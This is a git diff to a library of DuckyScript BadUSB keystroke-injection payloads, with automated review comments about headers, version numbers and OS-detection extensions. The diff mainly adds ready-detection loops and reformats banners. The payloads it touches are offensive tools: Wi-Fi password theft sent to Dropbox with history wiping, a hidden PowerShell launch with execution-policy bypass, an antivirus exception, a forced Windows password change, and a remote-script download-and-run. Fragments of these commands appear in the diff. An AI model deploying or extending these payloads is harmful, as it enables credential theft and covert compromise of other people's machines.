diff --git a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
index bb5b1b65a..3186ee3ea 100644
--- a/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
+++ b/payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
@@ -1,27 +1,53 @@
-REM #######################################################
-REM # |
-REM # Title : Exfiltrate Wifi Passwords - Linux |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration, Credentials, Execution |
-REM # Target : Linux |
-REM # |
-REM #######################################################
+REM_BLOCK
+#######################################################
+# #
+# Title : Exfiltrate Wifi Passwords - Linux #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration, Credentials, Execution #
+# Target : Linux #
+# #
+#######################################################
+END_REM
REM Requirements:
REM - Permissions
REM - Internet connection
REM - Dropbox Token
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-
REM #### PREREQUISITES SECTION ####
-
-
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
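Review bot: The header block still reads `Version : 1.0`, although this hunk changes run-time behaviour by replacing the fixed `DELAY 1000` with the DETECT_READY loop. The pasted extension also carries its own `REM VERSION 1.1`, so the file now shows two unrelated version numbers and a reader cannot tell which revision of the payload they hold. Bump the payload header or add a line such as `REM 1.1 - fixed boot delay replaced by DETECT_READY` under it. The same applies to the other payload.txt headers converted in this commit; the payload body continues outside this hunk.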
@@ -41,8 +67,6 @@ ENTER
REM #### ZIP SECTION ####
-
-
DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER
@@ -61,8 +85,6 @@ ENTER
REM #### WiFi && ZIP SECTION ####
-
-
REM Get all WiFi data
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
ENTER
@@ -85,8 +107,6 @@ DELAY 3000
REM #### EXFILTRATE SECTION ####
-
-
REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/
@@ -105,8 +125,6 @@ ENTER
REM #### REMOVE TRACES ####
-
-
DELAY 2000
STRING history -c
ENTER
diff --git a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
index 379fe4545..4b92997c7 100644
--- a/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
+++ b/payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
@@ -10,8 +10,49 @@ REM # |
REM ###################################################################
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
STRING powershell -w h -ep bypass $discord='
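Review bot: `$_OS` is assigned by the pasted PASSIVE_WINDOWS_DETECT block, but nothing visible after `END_EXTENSION` reads it, so the key sequence starting at `GUI r` is sent whatever the detection result was; the extension's own text, `See end of payload for usage within payload`, does not match how it is used here. Either state the intent with a comment such as `REM PASSIVE_WINDOWS_DETECT is used only as a ready-wait; $_OS is not read`, or wrap the body in `IF ($_OS == WINDOWS) THEN` … `END_IF` as the block's own example shows, so the Windows-only sequence is not typed into a different kind of host. The same pattern appears in the other hunks that add this extension (Add_An_Excepiton_To_Avast_Antivirus, Change_Windows_User_Name, Change_the_password_of_the_windows_user, CloseAllApplicationsInWindows, Install_And_Run_Any_Arbitrary_Executable, Make_Windows_performant_but_ugly_and_boring). The rest of the payload lies outside the hunk, so a later read of `$_OS` cannot be ruled out.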
diff --git a/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt b/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
index 550a2c50f..c4b990716 100644
--- a/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
+++ b/payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
@@ -1,24 +1,65 @@
-REM ########################################################
-REM # |
-REM # Title : Add An Exception To Avast Antivirus |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ########################################################
-
+REM_BLOCK
+########################################################
+# #
+# Title : Add An Exception To Avast Antivirus #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+########################################################
+END_REM
REM Requirements:
REM - Avast installed and configured
-
REM Set the full-path that you want to set as exception
DEFINE FULL-PATH example/to/path
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
REM Open Avast application
-DELAY 2000
GUI
DELAY 1000
STRING avast
diff --git a/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt b/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
index a44c42a2f..10174db7f 100644
--- a/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
+++ b/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
@@ -1,13 +1,14 @@
-REM ##############################################
-REM # |
-REM # Title : Call Someone On An iPhone |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : iPhone |
-REM # |
-REM ##############################################
-
+REM_BLOCK
+##############################################
+# |
+# Title : Call Someone On An iPhone |
+# Author : Aleff |
+# Version : 1.0 |
+# Category : Execution |
+# Target : iPhone |
+# |
+##############################################
+END_REM
REM Requirements:
REM - The phone must be unlocked
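Review bot: The converted header in this file still closes each row with `|`, while the other payload headers rewritten in this commit close the box with `#` (for example the ChangeGitRemoteLink header). For a uniform banner, end these rows with `#` as well, e.g. `# Author : Aleff #`, padded to the width of the top and bottom rules.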
diff --git a/payloads/library/execution/ChangeGitRemoteLink/payload.txt b/payloads/library/execution/ChangeGitRemoteLink/payload.txt
index eafac4163..0348ece21 100644
--- a/payloads/library/execution/ChangeGitRemoteLink/payload.txt
+++ b/payloads/library/execution/ChangeGitRemoteLink/payload.txt
@@ -1,12 +1,14 @@
-REM ###########################################
-REM # |
-REM # Title : Change Remote Git Link |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11/Linux |
-REM # |
-REM ###########################################
+REM_BLOCK
+###########################################
+# #
+# Title : Change Remote Git Link #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11/Linux #
+# #
+###########################################
+END_REM
REM Requirements:
REM - Internet Connection
diff --git a/payloads/library/execution/ChangeMacAddress_Linux/payload.txt b/payloads/library/execution/ChangeMacAddress_Linux/payload.txt
index e0c538fd5..3130f0d88 100644
--- a/payloads/library/execution/ChangeMacAddress_Linux/payload.txt
+++ b/payloads/library/execution/ChangeMacAddress_Linux/payload.txt
@@ -1,25 +1,50 @@
-
-REM ###########################################
-REM # |
-REM # Title : Change Linux MAC Address |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ###########################################
+REM_BLOCK
+###########################################
+# #
+# Title : Change Linux MAC Address #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+###########################################
+END_REM
REM Requirements:
REM - Permissions
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
REM You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
diff --git a/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt b/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt
index af732aac6..60502ad4d 100644
--- a/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt
+++ b/payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt
@@ -1,25 +1,49 @@
-
-REM ###############################################
-REM # |
-REM # Title : Change Network Configuration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ###############################################
+REM_BLOCK
+###############################################
+# #
+# Title : Change Network Configuration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+###############################################
+END_REM
REM Requirements:
REM - Permissions
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example
STRING sudo su
diff --git a/payloads/library/execution/Change_Windows_User_Name/payload.txt b/payloads/library/execution/Change_Windows_User_Name/payload.txt
index d0d566df0..5b1d685d7 100644
--- a/payloads/library/execution/Change_Windows_User_Name/payload.txt
+++ b/payloads/library/execution/Change_Windows_User_Name/payload.txt
@@ -1,12 +1,14 @@
-REM #############################################
-REM # |
-REM # Title : Change Windows User Name |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM #############################################
+REM_BLOCK
+#############################################
+# #
+# Title : Change Windows User Name #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+#############################################
+END_REM
REM Requirements:
REM - Nothing
@@ -17,8 +19,50 @@ REM - Payload tested on Windows 11 Eng
REM Set the new name that you want to set
DEFINE NEW_NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
REM Open Windows research
-DELAY 2000
GUI
DELAY 1000
diff --git a/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt b/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt
index 87e22c8e1..a85a62901 100644
--- a/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt
+++ b/payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt
@@ -1,12 +1,14 @@
-REM ############################################################
-REM # |
-REM # Title : Change the password of the Windows user |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM ############################################################
+REM_BLOCK
+############################################################
+# #
+# Title : Change the password of the Windows user #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Nothing (i know it's absurd)
@@ -14,7 +16,49 @@ REM - Nothing (i know it's absurd)
REM You must define the new Windows user password
DEFINE NEW_PASSWORD example
-DELAY 1000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI x
DELAY 500
STRING a
diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/README.md b/payloads/library/execution/CloseAllApplicationsInWindows/README.md
index 8fb34f06a..c51257749 100644
--- a/payloads/library/execution/CloseAllApplicationsInWindows/README.md
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/README.md
@@ -1,4 +1,4 @@
-# Close All Applications - BADUSB ✅
+# Close All Applications
A script used to close all target open applications.
diff --git a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
index 5c1bd2a34..eab598ee8 100644
--- a/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
+++ b/payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
@@ -1,27 +1,69 @@
-REM #####################################################
-REM # |
-REM # Title : Close All Applications |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM #####################################################
+REM_BLOCK
+#####################################################
+# #
+# Title : Close All Applications #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10-11 #
+# #
+#####################################################
+END_REM
REM Plug-And-Play
-REM
REM 1. Open a powershell
REM 2. Download a Python script
REM 3. Execute it
REM 4. Remove Python script downloaded
REM 5. Delete powershell history
-REM
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
DEFINE POWERSHEL_CODE example.com
-DELAY 2000
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI x
DELAY 250
DOWNARROW
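Review bot: The step list kept in this header contradicts the line right below it. Steps 2 and 4 say `Download a Python script` and `Remove Python script downloaded`, while the REM above the DEFINE names `close_all_app.ps1`. Since the hunk is already tidying these comments, align them, for example `REM 2. Download a PowerShell script` and `REM 4. Remove the downloaded script`, and change `Reply with YOUR LINK` to `Replace with YOUR LINK` if that is what was meant. The name `POWERSHEL_CODE` looks like a misspelling too, but its uses lie outside the hunk, so a rename would have to cover the whole file.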
diff --git a/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt b/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt
index e109d552a..0729d4d13 100644
--- a/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt
+++ b/payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt
@@ -1,12 +1,14 @@
-REM ############################################################
-REM # #
-REM # Title : Defend yourself against AtlasVPN Bug-Door #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Execution #
-REM # Target : Linux #
-REM # #
-REM ############################################################
+REM_BLOCK
+############################################################
+# #
+# Title : Defend yourself against AtlasVPN Bug-Door #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+############################################################
+END_REM
REM Requirements:
REM - Administrator Permission
@@ -15,7 +17,34 @@ REM - AtlasVPN installed
REM Define the sudo user password
DEFINE #SUDO-PWS example
-DELAY 1000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
diff --git a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt
index 0a863ff86..c3c668404 100644
--- a/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt
+++ b/payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt
@@ -1,14 +1,14 @@
-
-REM ################################################################
-REM # |
-REM # Title : Edit The Default Real App With An Arbitrary |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : GNU/Linux (Debian based tested) |
-REM # |
-REM ################################################################
-
+REM_BLOCK
+################################################################
+# #
+# Title : Edit The Default Real App With An Arbitrary #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : GNU/Linux (Debian based tested) #
+# #
+################################################################
+END_REM
REM Requirements:
REM - sudo permissions
@@ -16,11 +16,9 @@ REM - Internet connection
REM - Executable app
REM - '.desktop' file
-
REM Note:
REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it
-
REM Set the link from wich will be downloaded the zip archive
DEFINE ARBITRARY_APP_LINK example
@@ -33,9 +31,35 @@ DEFINE ORIGINAL_DESKTOP_FILE_NAME example
REM sudo permissions needed
DEFINE SUDO example
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
REM Open a shell
-DELAY 2000
CTRL-ALT t
DELAY 1000
diff --git a/payloads/library/execution/ExploitingAnExecutableFile/payload.txt b/payloads/library/execution/ExploitingAnExecutableFile/payload.txt
index 8aa455d98..0d3027336 100644
--- a/payloads/library/execution/ExploitingAnExecutableFile/payload.txt
+++ b/payloads/library/execution/ExploitingAnExecutableFile/payload.txt
@@ -1,25 +1,50 @@
-
-REM ################################################
-REM # |
-REM # Title : Exploiting An Executable File |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Linux |
-REM # |
-REM ################################################
+REM_BLOCK
+################################################
+# #
+# Title : Exploiting An Executable File #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Linux #
+# #
+################################################
+END_REM
REM Requirements:
REM - Nothing, it is Plug-And-Play but you can change it as you want.
-DELAY 1000
-CTRL-ALT t
-DELAY 2000
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
-REM #### Script ####
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+CTRL-ALT t
+DELAY 2000
+
+REM #### Script ####
STRINGLN
function search_file {
for file in "$1"/*; do
diff --git a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md
index 4979471fb..3929e47ae 100644
--- a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md
+++ b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md
@@ -108,18 +108,12 @@ Happy Hacking!
Github
-
-
-
-
- Instagram
- |
- Discord
+ Linkedin
|
-
+
\ No newline at end of file
diff --git a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt
index 80b90cbe0..3edb530b9 100644
--- a/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt
+++ b/payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt
@@ -1,27 +1,67 @@
-REM ###########################################################################################
-REM # |
-REM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Execution |
-REM # Target : Windows 10/11 |
-REM # |
-REM ###########################################################################################
-
+REM_BLOCK
+###########################################################################################
+# #
+# Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Execution #
+# Target : Windows 10/11 #
+# #
+###########################################################################################
+END_REM
REM Requirements:
REM - Nothing
-
REM Define here your hexadecimal code
DEFINE #HEX_CODE example
-
REM Note:
REM - Tested on Windows 11
REM - Running checked but not blocked by Avast antivirus
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
